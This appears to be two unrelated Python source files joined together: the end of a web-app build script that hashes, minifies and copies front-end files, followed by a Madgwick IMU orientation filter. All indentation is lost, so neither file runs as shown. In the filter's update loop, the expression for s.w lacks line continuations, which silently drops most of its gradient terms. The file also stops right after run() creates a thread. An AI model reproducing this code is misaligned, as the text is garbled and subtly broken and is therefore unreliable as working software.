third_party_css_filepath, 'w+') as third_party_css_file:
_join_files(dependency_filepaths['css'], third_party_css_file)
ensure_directory_exists(webfonts_dir)
_execute_tasks(
_generate_copy_tasks_for_fonts(
dependency_filepaths['fonts'], webfonts_dir))
def build_using_webpack(config_path):
"""Execute webpack build process. This takes all TypeScript files we have in
/templates and generates JS bundles according the require() imports
and also compiles HTML pages into the /backend_prod_files/webpack_bundles
folder. The files are later copied into /build/webpack_bundles.
Args:
config_path: str. Webpack config to be used for building.
"""
python_utils.PRINT('Building webpack')
cmd = '%s --max-old-space-size=2400 %s --config %s' % (
common.NODE_BIN_PATH, WEBPACK_FILE, config_path)
subprocess.check_call(cmd, shell=True)
def hash_should_be_inserted(filepath):
"""Returns if the file should be renamed to include hash in
the path.
Args:
filepath: str. Path relative to directory we are currently building.
Returns:
bool. True if filepath should contain hash else False.
"""
return not any(
fnmatch.fnmatch(filepath, pattern) for pattern
in FILEPATHS_NOT_TO_RENAME)
def should_file_be_built(filepath):
"""Determines if the file should be built.
- JS files: Returns False if filepath matches with pattern in
JS_FILENAME_SUFFIXES_TO_IGNORE or is in JS_FILEPATHS_NOT_TO_BUILD,
else returns True.
- Python files: Returns False if filepath ends with _test.py, else
returns True
- TS files: Returns False.
- Other files: Returns False if filepath matches with pattern in
GENERAL_FILENAMES_TO_IGNORE, else returns True.
Args:
filepath: str. Path relative to file we are currently building.
Returns:
bool. True if filepath should be built, else False.
"""
if filepath.endswith('.js'):
return all(
not filepath.endswith(p) for p in JS_FILENAME_SUFFIXES_TO_IGNORE)
elif filepath.endswith('_test.py'):
return False
elif filepath.endswith('.ts'):
return False
else:
return not any(
filepath.endswith(p) for p in GENERAL_FILENAMES_TO_IGNORE)
def generate_copy_tasks_to_copy_from_source_to_target(
source, target, file_hashes):
"""Generate copy task for each file in source directory, excluding files
with extensions in FILE_EXTENSIONS_TO_IGNORE. Insert hash from hash dict
into the destination filename.
Args:
source: str. Path relative to /oppia directory of directory
containing files and directories to be copied.
target: str. Path relative to /oppia directory of directory where
to copy the files and directories.
file_hashes: dict(str, str). Dictionary with filepaths as keys and
hashes of file content as values.
Returns:
deque(Thread). A deque that contains all copy tasks queued
to be processed.
"""
python_utils.PRINT('Processing %s' % os.path.join(os.getcwd(), source))
python_utils.PRINT('Copying into %s' % os.path.join(os.getcwd(), target))
copy_tasks = collections.deque()
for root, dirnames, filenames in os.walk(os.path.join(os.getcwd(), source)):
for directory in dirnames:
python_utils.PRINT('Copying %s' % os.path.join(root, directory))
for filename in filenames:
source_path = os.path.join(root, filename)
# Python files should not be copied to final build directory.
if not any(
source_path.endswith(p) for p in FILE_EXTENSIONS_TO_IGNORE):
target_path = source_path
# The path in hashes.json file is in posix style,
# see the comment above HASHES_JSON_FILENAME for details.
relative_path = common.convert_to_posixpath(
os.path.relpath(source_path, source))
if (hash_should_be_inserted(source + relative_path) and
relative_path in file_hashes):
relative_path = (
_insert_hash(relative_path, file_hashes[relative_path]))
target_path = os.path.join(os.getcwd(), target, relative_path)
ensure_directory_exists(target_path)
copy_task = threading.Thread(
target=safe_copy_file,
args=(source_path, target_path,))
copy_tasks.append(copy_task)
return copy_tasks
def is_file_hash_provided_to_frontend(filepath):
"""Returns if the hash for the filepath should be provided to the frontend.
Args:
filepath: str. Relative path to the file.
Returns:
bool. True if file hash should be provided to the frontend else False.
"""
return any(
fnmatch.fnmatch(filepath, pattern) for pattern
in FILEPATHS_PROVIDED_TO_FRONTEND)
def generate_md5_hash(filepath):
"""Returns md5 hash of file.
Args:
filepath: str. Absolute path to the file.
Returns:
str. Hexadecimal hash of specified file.
"""
m = hashlib.md5()
with python_utils.open_file(filepath, 'rb', encoding=None) as f:
while True:
buf = f.read(HASH_BLOCK_SIZE)
if not buf:
break
m.update(buf)
return m.hexdigest()
def get_filepaths_by_extensions(source_dir, file_extensions):
"""Return list of filepaths in a directory with certain extensions,
excluding filepaths that should not be built.
Args:
source_dir: str. Root directory to be walked.
file_extensions: tuple(str). Tuple of file extensions.
Returns:
list(str). List of filepaths with specified extensions.
"""
filepaths = []
for root, _, filenames in os.walk(source_dir):
for filename in filenames:
filepath = os.path.join(root, filename)
relative_filepath = os.path.relpath(filepath, source_dir)
if should_file_be_built(filepath) and any(
filename.endswith(p) for p in file_extensions):
filepaths.append(relative_filepath)
return filepaths
def get_file_hashes(directory_path):
"""Returns hashes of all files in directory tree, excluding files with
extensions in FILE_EXTENSIONS_TO_IGNORE or files that should not be built.
Args:
directory_path: str. Root directory of the tree.
Returns:
dict(str, str). Dictionary with keys specifying file paths and values
specifying file hashes.
"""
file_hashes = dict()
python_utils.PRINT(
'Computing hashes for files in %s'
% os.path.join(os.getcwd(), directory_path))
for root, _, filenames in os.walk(
os.path.join(os.getcwd(), directory_path)):
for filename in filenames:
filepath = os.path.join(root, filename)
if should_file_be_built(filepath) and not any(
filename.endswith(p) for p in FILE_EXTENSIONS_TO_IGNORE):
# The path in hashes.json file is in posix style,
# see the comment above HASHES_JSON_FILENAME for details.
complete_filepath = common.convert_to_posixpath(
os.path.join(root, filename))
relative_filepath = common.convert_to_posixpath(os.path.relpath(
complete_filepath, directory_path))
file_hashes[relative_filepath] = generate_md5_hash(
complete_filepath)
return file_hashes
def filter_hashes(file_hashes):
"""Filters hashes that should be provided to the frontend
and prefixes "/" in front of the keys.
Args:
file_hashes: dict(str, str). Dictionary with filepaths as keys and
hashes of file content as values.
Returns:
dict(str, str). Filtered dictionary of only filepaths that should be
provided to the frontend.
"""
filtered_hashes = dict()
for filepath, file_hash in file_hashes.items():
if is_file_hash_provided_to_frontend(filepath):
filtered_hashes['/' + filepath] = file_hash
return filtered_hashes
def save_hashes_to_file(file_hashes):
"""Return JS code that loads hashes needed for frontend into variable.
Args:
file_hashes: dict(str, str). Dictionary with filepaths as keys and
hashes of file content as values.
Returns:
str. JS code loading hashes as JSON into variable.
"""
# Only some of the hashes are needed in the frontend.
filtered_hashes = filter_hashes(file_hashes)
ensure_directory_exists(HASHES_JSON_FILEPATH)
with python_utils.open_file(HASHES_JSON_FILEPATH, 'w+') as hashes_json_file:
hashes_json_file.write(
python_utils.UNICODE(
json.dumps(filtered_hashes, ensure_ascii=False)))
hashes_json_file.write(u'\n')
def minify_func(source_path, target_path, filename):
"""Call the appropriate functions to handle different types of file
formats:
- HTML files: Remove whitespaces, interpolates paths in HTML to include
hashes in source directory and save edited file at target directory.
- CSS or JS files: Minify and save at target directory.
- Other files: Copy the file from source directory to target directory.
"""
skip_minify = any(
filename.endswith(p) for p in JS_FILENAME_SUFFIXES_NOT_TO_MINIFY)
if filename.endswith('.html'):
python_utils.PRINT('Building %s' % source_path)
with python_utils.open_file(source_path, 'r+') as source_html_file:
with python_utils.open_file(
target_path, 'w+') as minified_html_file:
process_html(source_html_file, minified_html_file)
elif ((filename.endswith('.css') or filename.endswith('.js')) and
not skip_minify):
python_utils.PRINT('Minifying %s' % source_path)
_minify(source_path, target_path)
else:
python_utils.PRINT('Copying %s' % source_path)
safe_copy_file(source_path, target_path)
def _execute_tasks(tasks, batch_size=24):
"""Starts all tasks and checks the results.
Runs no more than 'batch_size' tasks at a time.
"""
remaining_tasks = collections.deque(tasks)
currently_running_tasks = []
while remaining_tasks or currently_running_tasks:
if currently_running_tasks:
for task in collections.deque(currently_running_tasks):
if not task.is_alive():
currently_running_tasks.remove(task)
while remaining_tasks and len(currently_running_tasks) < batch_size:
task = remaining_tasks.popleft()
currently_running_tasks.append(task)
try:
task.start()
except RuntimeError:
raise OSError('threads can only be started once')
def generate_build_tasks_to_build_all_files_in_directory(source, target):
"""This function queues up tasks to build all files in a directory,
excluding files that should not be built.
Args:
source: str. Path relative to /oppia of directory containing source
files and directories to be built.
target: str. Path relative to /oppia of directory where the built files
and directories will be saved to.
Returns:
deque(Thread). A deque that contains all build tasks queued
to be processed.
"""
python_utils.PRINT('Processing %s' % os.path.join(os.getcwd(), source))
python_utils.PRINT('Generating into %s' % os.path.join(os.getcwd(), target))
build_tasks = collections.deque()
for root, dirnames, filenames in os.walk(os.path.join(os.getcwd(), source)):
for directory in dirnames:
python_utils.PRINT(
'Building directory %s' % os.path.join(root, directory))
for filename in filenames:
source_path = os.path.join(root, filename)
target_path = source_path.replace(source, target)
ensure_directory_exists(target_path)
if should_file_be_built(source_path):
task = threading.Thread(
target=minify_func,
args=(source_path, target_path, filename,))
build_tasks.append(task)
return build_tasks
def generate_build_tasks_to_build_files_from_filepaths(
source_path, target_path, filepaths):
"""This function queues up build tasks to build files from a list of
filepaths, excluding files that should not be built.
Args:
source_path: str. Path relative to /oppia directory of directory
containing files and directories to be copied.
target_path: str. Path relative to /oppia directory of directory where
to copy the files and directories.
filepaths: list(str). List of filepaths to be built.
Returns:
deque(Thread). A deque that contains all build tasks queued
to be processed.
"""
build_tasks = collections.deque()
for filepath in filepaths:
source_file_path = os.path.join(source_path, filepath)
target_file_path = os.path.join(target_path, filepath)
ensure_directory_exists(target_file_path)
if should_file_be_built(source_file_path):
task = threading.Thread(
target=minify_func,
args=(
source_file_path, target_file_path, filepath,))
build_tasks.append(task)
return build_tasks
def generate_delete_tasks_to_remove_deleted_files(
source_dir_hashes, staging_directory):
"""This function walks the staging directory and queues up deletion tasks to
remove files that are not in the hash dict i.e. remaining files in staging
directory that have since been deleted from source directory. Files with
extensions in FILE_EXTENSIONS_TO_IGNORE will be excluded.
Args:
source_dir_hashes: dict(str, str). Dictionary with filepaths as keys and
hashes of file content as values.
staging_directory: str. Path relative to /oppia directory of directory
containing files and directories to be walked.
Returns:
deque(Thread). A deque that contains all delete tasks
queued to be processed.
"""
python_utils.PRINT(
'Scanning directory %s to remove deleted file' % staging_directory)
delete_tasks = collections.deque()
for root, _, filenames in os.walk(
os.path.join(os.getcwd(), staging_directory)):
for filename in filenames:
target_path = os.path.join(root, filename)
# Ignore files with certain extensions.
if not any(
target_path.endswith(p) for p in FILE_EXTENSIONS_TO_IGNORE):
# On Windows the path is on Windows-Style, while the path in
# hashes is in posix style, we need to convert it so the check
# can run correctly.
relative_path = common.convert_to_posixpath(
os.path.relpath(target_path, staging_directory))
# Remove file found in staging directory but not in source
# directory, i.e. file not listed in hash dict.
if relative_path not in source_dir_hashes:
python_utils.PRINT(
'Unable to find %s in file hashes, deleting file'
% target_path)
task = threading.Thread(
target=safe_delete_file, args=(target_path,))
delete_tasks.append(task)
return delete_tasks
def get_recently_changed_filenames(source_dir_hashes, out_dir):
"""Compare hashes of source files and built files. Return a list of
filenames that were recently changed. Skips files that are not supposed to
built or already built.
Args:
source_dir_hashes: dict(str, str). Dictionary of hashes of files
to be built.
out_dir: str. Path relative to /oppia where built files are located.
Returns:
list(str). List of filenames expected to be re-hashed.
"""
# Hashes are created based on files' contents and are inserted between
# the filenames and their extensions,
# e.g base.240933e7564bd72a4dde42ee23260c5f.html
# If a file gets edited, a different MD5 hash is generated.
recently_changed_filenames = []
# Currently, Python files and HTML files are always re-built.
file_extensions_not_to_track = ('.html', '.py',)
for filename, md5_hash in source_dir_hashes.items():
# Skip files that are already built or should not be built.
if should_file_be_built(filename) and not any(
filename.endswith(p) for p in file_extensions_not_to_track):
final_filepath = _insert_hash(
os.path.join(out_dir, filename), md5_hash)
if not os.path.isfile(final_filepath):
# Filename with provided hash cannot be found, this file has
# been recently changed or created since last build.
recently_changed_filenames.append(filename)
if recently_changed_filenames:
python_utils.PRINT(
'The following files will be rebuilt due to recent changes: %s'
% recently_changed_filenames)
return recently_changed_filenames
def generate_build_tasks_to_build_directory(dirnames_dict):
"""This function queues up build tasks to build all files in source
directory if there is no existing staging directory. Otherwise, selectively
queue up build tasks to build recently changed files.
Args:
dirnames_dict: dict(str, str). This dict should contain three keys,
with corresponding values as follows:
- 'dev_dir': the directory that contains source files to be built.
- 'staging_dir': the directory that contains minified files waiting
for final copy process.
- 'out_dir': the final directory that contains built files with hash
inserted into filenames.
Returns:
deque(Thread). A deque that contains all build tasks queued
to be processed.
"""
source_dir = dirnames_dict['dev_dir']
staging_dir = dirnames_dict['staging_dir']
out_dir = dirnames_dict['out_dir']
build_tasks = collections.deque()
if not os.path.isdir(staging_dir):
# If there is no staging dir, perform build process on all files.
python_utils.PRINT('Creating new %s folder' % staging_dir)
ensure_directory_exists(staging_dir)
build_tasks += generate_build_tasks_to_build_all_files_in_directory(
source_dir, staging_dir)
else:
# If staging dir exists, rebuild all HTML and Python files.
file_extensions_to_always_rebuild = ('.html', '.py',)
python_utils.PRINT(
'Staging dir exists, re-building all %s files'
% ', '.join(file_extensions_to_always_rebuild))
filenames_to_always_rebuild = get_filepaths_by_extensions(
source_dir, file_extensions_to_always_rebuild)
build_tasks += generate_build_tasks_to_build_files_from_filepaths(
source_dir, staging_dir, filenames_to_always_rebuild)
dev_dir_hashes = get_file_hashes(source_dir)
source_hashes = {}
source_hashes.update(dev_dir_hashes)
# Clean up files in staging directory that cannot be found in file
# hashes dictionary.
_execute_tasks(generate_delete_tasks_to_remove_deleted_files(
source_hashes, staging_dir))
python_utils.PRINT(
'Getting files that have changed between %s and %s'
% (source_dir, out_dir))
recently_changed_filenames = get_recently_changed_filenames(
dev_dir_hashes, out_dir)
if recently_changed_filenames:
python_utils.PRINT(
'Re-building recently changed files at %s' % source_dir)
build_tasks += generate_build_tasks_to_build_files_from_filepaths(
source_dir, staging_dir, recently_changed_filenames)
else:
python_utils.PRINT(
'No changes detected. Using previously built files.')
return build_tasks
def _verify_filepath_hash(relative_filepath, file_hashes):
"""Ensure that hashes in filepaths match with the hash entries in hash
dict.
Args:
relative_filepath: str. Filepath that is relative from /build.
file_hashes: dict(str, str). Dictionary with filepaths as keys and
hashes of file content as values.
Raises:
ValueError. The hash dict is empty.
ValueError. Filepath has less than 2 partitions after splitting by '.'
delimiter.
ValueError. The filename does not contain hash.
KeyError. The filename's hash cannot be found in the hash dict.
"""
# Final filepath example:
# pages/base.240933e7564bd72a4dde42ee23260c5f.html.
if not file_hashes:
raise ValueError('Hash dict is empty')
filename_partitions = relative_filepath.split('.')
if len(filename_partitions) < 2:
raise ValueError('Filepath has less than 2 partitions after splitting')
hash_string_from_filename = filename_partitions[-2]
# Ensure hash string obtained from filename follows MD5 hash format.
if not re.search(r'([a-fA-F\d]{32})', relative_filepath):
if relative_filepath not in file_hashes:
return
raise ValueError(
'%s is expected to contain MD5 hash' % relative_filepath)
if hash_string_from_filename not in file_hashes.values():
raise KeyError(
'Hash from file named %s does not match hash dict values' %
relative_filepath)
def _verify_hashes(output_dirnames, file_hashes):
"""Verify a few metrics after build process finishes:
1) The hashes in filenames belongs to the hash dict.
2) hashes.json, third_party.min.css and third_party.min.js are built and
hashes are inserted.
Args:
output_dirnames: list(str). List of directory paths that contain
built files.
file_hashes: dict(str, str). Dictionary with filepaths as keys and
hashes of file content as values.
"""
# Make sure that hashed file name matches with current hash dict.
for built_dir in output_dirnames:
for root, _, filenames in os.walk(built_dir):
for filename in filenames:
parent_dir = os.path.basename(root)
converted_filepath = os.path.join(
THIRD_PARTY_GENERATED_DEV_DIR, parent_dir, filename)
if hash_should_be_inserted(converted_filepath):
# Obtain the same filepath format as the hash dict's key.
relative_filepath = os.path.relpath(
os.path.join(root, filename), built_dir)
_verify_filepath_hash(relative_filepath, file_hashes)
hash_final_filename = _insert_hash(
HASHES_JSON_FILENAME, file_hashes[HASHES_JSON_FILENAME])
# The path in hashes.json (generated via file_hashes) file is in posix
# style, see the comment above HASHES_JSON_FILENAME for details.
third_party_js_final_filename = _insert_hash(
MINIFIED_THIRD_PARTY_JS_RELATIVE_FILEPATH,
file_hashes[common.convert_to_posixpath(
MINIFIED_THIRD_PARTY_JS_RELATIVE_FILEPATH)])
# The path in hashes.json (generated via file_hashes) file is in posix
# style, see the comment above HASHES_JSON_FILENAME for details.
third_party_css_final_filename = _insert_hash(
MINIFIED_THIRD_PARTY_CSS_RELATIVE_FILEPATH,
file_hashes[common.convert_to_posixpath(
MINIFIED_THIRD_PARTY_CSS_RELATIVE_FILEPATH)])
_ensure_files_exist([
os.path.join(ASSETS_OUT_DIR, hash_final_filename),
os.path.join(
THIRD_PARTY_GENERATED_OUT_DIR, third_party_js_final_filename),
os.path.join(
THIRD_PARTY_GENERATED_OUT_DIR, third_party_css_final_filename)])
def generate_hashes():
"""Generates hashes for files."""
# The keys for hashes are filepaths relative to the subfolders of the future
# /build folder. This is so that the replacing inside the HTML files works
# correctly.
hashes = dict()
# Create hashes for all directories and files.
hash_dirs = [
ASSETS_DEV_DIR, EXTENSIONS_DIRNAMES_TO_DIRPATHS['dev_dir'],
TEMPLATES_CORE_DIRNAMES_TO_DIRPATHS['dev_dir'],
THIRD_PARTY_GENERATED_DEV_DIR]
for hash_dir in hash_dirs:
hashes.update(get_file_hashes(hash_dir))
# Save hashes as JSON and write the JSON into JS file
# to make the hashes available to the frontend.
save_hashes_to_file(hashes)
# Update hash dict with newly created hashes.json.
hashes.update(
{HASHES_JSON_FILENAME: generate_md5_hash(HASHES_JSON_FILEPATH)})
# Make sure /assets/hashes.json is available to the frontend.
_ensure_files_exist([HASHES_JSON_FILEPATH])
return hashes
def generate_build_directory(hashes):
"""Generates hashes for files. Minifies files and interpolates paths
in HTMLs to include hashes. Renames the files to include hashes and copies
them into build directory.
"""
python_utils.PRINT('Building Oppia in production mode...')
build_tasks = collections.deque()
copy_tasks = collections.deque()
# Build files in /extensions and copy them into staging directory.
build_tasks += generate_build_tasks_to_build_directory(
EXTENSIONS_DIRNAMES_TO_DIRPATHS)
# Minify all template files and copy them into staging directory.
build_tasks += generate_build_tasks_to_build_directory(
TEMPLATES_CORE_DIRNAMES_TO_DIRPATHS)
_execute_tasks(build_tasks)
# Copy all files from staging directory to production directory.
copy_input_dirs = [
ASSETS_DEV_DIR, EXTENSIONS_DIRNAMES_TO_DIRPATHS['staging_dir'],
TEMPLATES_CORE_DIRNAMES_TO_DIRPATHS['staging_dir'],
THIRD_PARTY_GENERATED_DEV_DIR,
WEBPACK_DIRNAMES_TO_DIRPATHS['staging_dir']]
copy_output_dirs = [
ASSETS_OUT_DIR, EXTENSIONS_DIRNAMES_TO_DIRPATHS['out_dir'],
TEMPLATES_CORE_DIRNAMES_TO_DIRPATHS['out_dir'],
THIRD_PARTY_GENERATED_OUT_DIR, WEBPACK_DIRNAMES_TO_DIRPATHS['out_dir']]
assert len(copy_input_dirs) == len(copy_output_dirs)
for i in python_utils.RANGE(len(copy_input_dirs)):
safe_delete_directory_tree(copy_output_dirs[i])
copy_tasks += generate_copy_tasks_to_copy_from_source_to_target(
copy_input_dirs[i], copy_output_dirs[i], hashes)
_execute_tasks(copy_tasks)
_verify_hashes(copy_output_dirs, hashes)
source_dirs_for_assets = [ASSETS_DEV_DIR, THIRD_PARTY_GENERATED_DEV_DIR]
output_dirs_for_assets = [ASSETS_OUT_DIR, THIRD_PARTY_GENERATED_OUT_DIR]
_compare_file_count(source_dirs_for_assets, output_dirs_for_assets)
source_dirs_for_third_party = [THIRD_PARTY_GENERATED_DEV_DIR]
output_dirs_for_third_party = [THIRD_PARTY_GENERATED_OUT_DIR]
_compare_file_count(
source_dirs_for_third_party, output_dirs_for_third_party)
source_dirs_for_webpack = [WEBPACK_DIRNAMES_TO_DIRPATHS['staging_dir']]
output_dirs_for_webpack = [WEBPACK_DIRNAMES_TO_DIRPATHS['out_dir']]
_compare_file_count(
source_dirs_for_webpack, output_dirs_for_webpack)
source_dirs_for_extensions = [
EXTENSIONS_DIRNAMES_TO_DIRPATHS['dev_dir']]
output_dirs_for_extensions = [EXTENSIONS_DIRNAMES_TO_DIRPATHS['out_dir']]
_compare_file_count(source_dirs_for_extensions, output_dirs_for_extensions)
source_dirs_for_templates = [
TEMPLATES_CORE_DIRNAMES_TO_DIRPATHS['dev_dir']]
output_dirs_for_templates = [
TEMPLATES_CORE_DIRNAMES_TO_DIRPATHS['out_dir']]
_compare_file_count(source_dirs_for_templates, output_dirs_for_templates)
python_utils.PRINT('Build completed.')
def main(args=None):
"""The main method of this script."""
options = _PARSER.parse_args(args=args)
if options.maintenance_mode and not options.prod_env:
raise Exception(
'maintenance_mode should only be enabled in prod build.')
# Regenerate /third_party/generated from scratch.
safe_delete_directory_tree(THIRD_PARTY_GENERATED_DEV_DIR)
build_third_party_libs(THIRD_PARTY_GENERATED_DEV_DIR)
# If minify_third_party_libs_only is set to True, skips the rest of the
# build process once third party libs are minified.
if options.minify_third_party_libs_only:
if options.prod_env:
minify_third_party_libs(THIRD_PARTY_GENERATED_DEV_DIR)
return
else:
raise Exception(
'minify_third_party_libs_only should not be '
'set in non-prod env.')
modify_constants(
prod_env=options.prod_env,
emulator_mode=not options.deploy_mode,
maintenance_mode=options.maintenance_mode)
if options.prod_env:
minify_third_party_libs(THIRD_PARTY_GENERATED_DEV_DIR)
hashes = generate_hashes()
if options.deparallelize_terser:
if options.source_maps:
raise Exception(
'source_maps flag shouldn\'t be used with '
'deparallelize_terser flag.')
build_using_webpack(WEBPACK_TERSER_CONFIG)
elif options.source_maps:
build_using_webpack(WEBPACK_PROD_SOURCE_MAPS_CONFIG)
else:
build_using_webpack(WEBPACK_PROD_CONFIG)
generate_app_yaml(
deploy_mode=options.deploy_mode,
maintenance_mode=options.maintenance_mode)
generate_build_directory(hashes)
save_hashes_to_file(dict())
# The 'no coverage' pragma is used as this line is un-testable. This is because
# it will only be called when build.py is used as a script.
if __name__ == '__main__': # pragma: no cover
main()
|
orientation.py
|
import numpy
from classes.quaternion import *
from classes.dataStreamReader import *
import threading
import math
import time
class Madgwick(threading.Thread):
# IMU sensor needs to be rotated by PI/2 on x axis!
# IMU data: timestamp, angular_velocity, linear_acceleration, magnetic_field
IMU_FREQ = 60.0 # 60Hz
GAIN = 0.56 # around 0.5 should be quite fast and without big overshoot
def __init__(self, imu_data, sample_frequency=IMU_FREQ, gain=GAIN):
"""
Initializes Madgwick's filter implementation.
:param imu_data: need to receive object of type Reader that returns data from IMU
:param sample_frequency: self explanatory - usually it is fixed frequency of simulation,
didn't figure out how to change that tho
:param gain: based on this settling time and overshoot will change
"""
super(Madgwick, self).__init__()
time.sleep(1) # need to give some time to let data reader start or it will be a total failure
self.imu_data = imu_data
self.q = Quaternion()
self.gain = gain
self.sample_frequency = sample_frequency
self.prev_data_time = time.time()
self.prev_update_time = time.time()
# self.roll = 0.0
# self.pitch = 0.0
# self.yaw = 0.0
def roll(self):
"""
Roll wrapper.
:return: roll in degrees (-180, 180), base is 90 degrees, 180 when lying on right side,
0 when lying on left side
"""
roll, _, _ = self.q.quaternion_to_angles()
return roll
def pitch(self):
"""
Pitch wrapper.
:return: pitch in degrees (-90, 90), base is 0 degrees, positive values increase when looking down,
negative values decrease when looking up
"""
_, pitch, _ = self.q.quaternion_to_angles()
return pitch
def yaw(self):
"""
Yaw wrapper.
:return: yaw in degrees (-180, 180), base is 0 degrees, positive values when rotation left, negative values when
rotating right, given that roll is positive, when reaches 180 the sign changes
"""
_, _, yaw = self.q.quaternion_to_angles()
return yaw
def angles(self):
"""
return all angles in degrees
:return:
"""
return self.q.quaternion_to_angles()
def rate_of_change_of_quaternion_from_gyro(self, gyro):
"""
Calculates rate of change of quaternion from gyroscope data.
:param gyro: list [gx, gy, gz] with rad/s
:return:
"""
q_dot = Quaternion()
q_dot.w = 0.5 * (-self.q.x * gyro[0] - self.q.y * gyro[1] - self.q.z * gyro[2])
q_dot.x = 0.5 * (self.q.w * gyro[0] + self.q.y * gyro[2] - self.q.z * gyro[1])
q_dot.y = 0.5 * (self.q.w * gyro[1] - self.q.x * gyro[2] + self.q.z * gyro[0])
q_dot.z = 0.5 * (self.q.w * gyro[2] + self.q.x * gyro[1] - self.q.y * gyro[0])
return q_dot
def normalize_vec(self, vec):
"""
Normalizes list of length 3
:param vec: list [v1, v2, v3]
:return: normalized list
"""
# inv sqrt
recip_norm = (vec[0] ** 2 + vec[1] ** 2 + vec[2] ** 2) ** -0.5
vec[0] *= recip_norm
vec[1] *= recip_norm
vec[2] *= recip_norm
return vec
def update(self):
"""
Heart of the algorithm. Collects imu data from data reader and iterates few times on one sample. Normalizes some
things - actually You don't want to know what happens here. Just treat it like a big black box that gives
orientation.
Must be run as a thread!
:return:
"""
while True:
# initial data sample
acc = self.imu_data.get('linear_acceleration')
gyro = self.imu_data.get('angular_velocity')
mag = self.imu_data.get('magnetic_field')
# data update every 16.66667ms
if time.time() > self.prev_data_time + 1.0 / self.sample_frequency:
# print("obtaining data")
self.prev_data_time = time.time()
acc = self.imu_data.get('linear_acceleration')
gyro = self.imu_data.get('angular_velocity')
mag = self.imu_data.get('magnetic_field')
# madgwick update every 3.33333ms so it does update 5 times on each data sample
if time.time() > self.prev_update_time + 1.0 / 5.0 / self.sample_frequency:
# print("update")
self.prev_update_time = time.time()
q_dot = self.rate_of_change_of_quaternion_from_gyro(gyro)
# Compute feedback only if accelerometer measurement valid (avoids NaN in accelerometer normalisation)
if not((acc[0] == 0.0) and (acc[1] == 0.0) and (acc[2] == 0.0)):
# Normalise accelerometer measurement
acc = self.normalize_vec(acc)
# Normalise magnetometer measurement
mag = self.normalize_vec(mag)
# Auxiliary variables to avoid repeated arithmetic
two_q0mx = 2.0 * self.q.w * mag[0]
two_q0my = 2.0 * self.q.w * mag[1]
two_q0mz = 2.0 * self.q.w * mag[2]
two_q1mx = 2.0 * self.q.x * mag[0]
two_q0 = 2.0 * self.q.w
two_q1 = 2.0 * self.q.x
two_q2 = 2.0 * self.q.y
two_q3 = 2.0 * self.q.z
two_q0q2 = 2.0 * self.q.w * self.q.y
two_q2q3 = 2.0 * self.q.y * self.q.z
q0q0 = self.q.w ** 2
q0q1 = self.q.w * self.q.x
q0q2 = self.q.w * self.q.y
q0q3 = self.q.w * self.q.z
q1q1 = self.q.x ** 2
q1q2 = self.q.x * self.q.y
q1q3 = self.q.x * self.q.z
q2q2 = self.q.y ** 2
q2q3 = self.q.y * self.q.z
q3q3 = self.q.z ** 2
# Reference direction of Earth's magnetic field
hx = mag[0] * q0q0 - two_q0my * self.q.z + two_q0mz * self.q.y + mag[0] * q1q1 \
+ two_q1 * mag[1] * self.q.y + two_q1 * mag[2] * self.q.z - mag[0] * q2q2 - mag[0] * q3q3
hy = two_q0mx * self.q.z + mag[1] * q0q0 - two_q0mz * self.q.x + two_q1mx * self.q.y \
- mag[1] * q1q1 + mag[1] * q2q2 + two_q2 * mag[2] * self.q.z - mag[1] * q3q3
two_bx = math.sqrt(hx * hx + hy * hy)
two_bz = -two_q0mx * self.q.y + two_q0my * self.q.x + mag[2] * q0q0 + two_q1mx * self.q.z \
- mag[2] * q1q1 + two_q2 * mag[1] * self.q.z - mag[2] * q2q2 + mag[2] * q3q3
four_bx = 2.0 * two_bx
four_bz = 2.0 * two_bz
# Gradient decent algorithm corrective step
s = Quaternion()
s.w = -two_q2 * (2.0 * q1q3 - two_q0q2 - acc[0]) + two_q1 * (2.0 * q0q1 + two_q2q3 - acc[1])
- two_bz * self.q.y * (two_bx * (0.5 - q2q2 - q3q3) + two_bz * (q1q3 - q0q2) - mag[0])
+ (-two_bx * self.q.z + two_bz * self.q.x) * (two_bx * (q1q2 - q0q3) + two_bz * (q0q1 + q2q3) - mag[1])
+ two_bx * self.q.y * (two_bx * (q0q2 + q1q3) + two_bz * (0.5 - q1q1 - q2q2) - mag[2])
s.x = two_q3 * (2.0 * q1q3 - two_q0q2 - acc[0]) + two_q0 * (2.0 * q0q1 + two_q2q3 - acc[1]) \
- 4.0 * self.q.x * (1 - 2.0 * q1q1 - 2.0 * q2q2 - acc[2]) + two_bz * self.q.z * (two_bx * (0.5 - q2q2 - q3q3) + two_bz * (q1q3 - q0q2) - mag[0]) \
+ (two_bx * self.q.y + two_bz * self.q.w) * (two_bx * (q1q2 - q0q3) + two_bz * (q0q1 + q2q3) - mag[1]) \
+ (two_bx * self.q.z - four_bz * self.q.x) * (two_bx * (q0q2 + q1q3) + two_bz * (0.5 - q1q1 - q2q2) - mag[2])
s.y = -two_q0 * (2.0 * q1q3 - two_q0q2 - acc[0]) + two_q3 * (2.0 * q0q1 + two_q2q3 - acc[1]) \
- 4.0 * self.q.y * (1 - 2.0 * q1q1 - 2.0 * q2q2 - acc[2]) + (-four_bx * self.q.y - two_bz * self.q.w) \
* (two_bx * (0.5 - q2q2 - q3q3) + two_bz * (q1q3 - q0q2) - mag[0]) + (two_bx * self.q.x + two_bz * self.q.z) \
* (two_bx * (q1q2 - q0q3) + two_bz * (q0q1 + q2q3) - mag[1]) + (two_bx * self.q.w - four_bz * self.q.y) \
* (two_bx * (q0q2 + q1q3) + two_bz * (0.5 - q1q1 - q2q2) - mag[2])
s.z = two_q1 * (2.0 * q1q3 - two_q0q2 - acc[0]) + two_q2 * (2.0 * q0q1 + two_q2q3 - acc[1]) \
+ (-four_bx * self.q.z + two_bz * self.q.x) * (two_bx * (0.5 - q2q2 - q3q3) + two_bz * (q1q3 - q0q2) - mag[0]) \
+ (-two_bx * self.q.w + two_bz * self.q.y) * (two_bx * (q1q2 - q0q3) + two_bz * (q0q1 + q2q3) - mag[1]) \
+ two_bx * self.q.x * (two_bx * (q0q2 + q1q3) + two_bz * (0.5 - q1q1 - q2q2) - mag[2])
# Normalise
s.normalize()
# Apply feedback step
q_dot.w -= self.gain * s.w
q_dot.x -= self.gain * s.x
q_dot.y -= self.gain * s.y
q_dot.z -= self.gain * s.z
# Integrate rate of change of quaternion to yield quaternion
self.q.w += q_dot.w * (1.0 / self.sample_frequency)
self.q.x += q_dot.x * (1.0 / self.sample_frequency)
self.q.y += q_dot.y * (1.0 / self.sample_frequency)
self.q.z += q_dot.z * (1.0 / self.sample_frequency)
# // Normalise quaternion
self.q.normalize()
def run(self):
"""
Runs the update method as a thread.
:return:
"""
update_thread = threading.Thread(target=self.update)
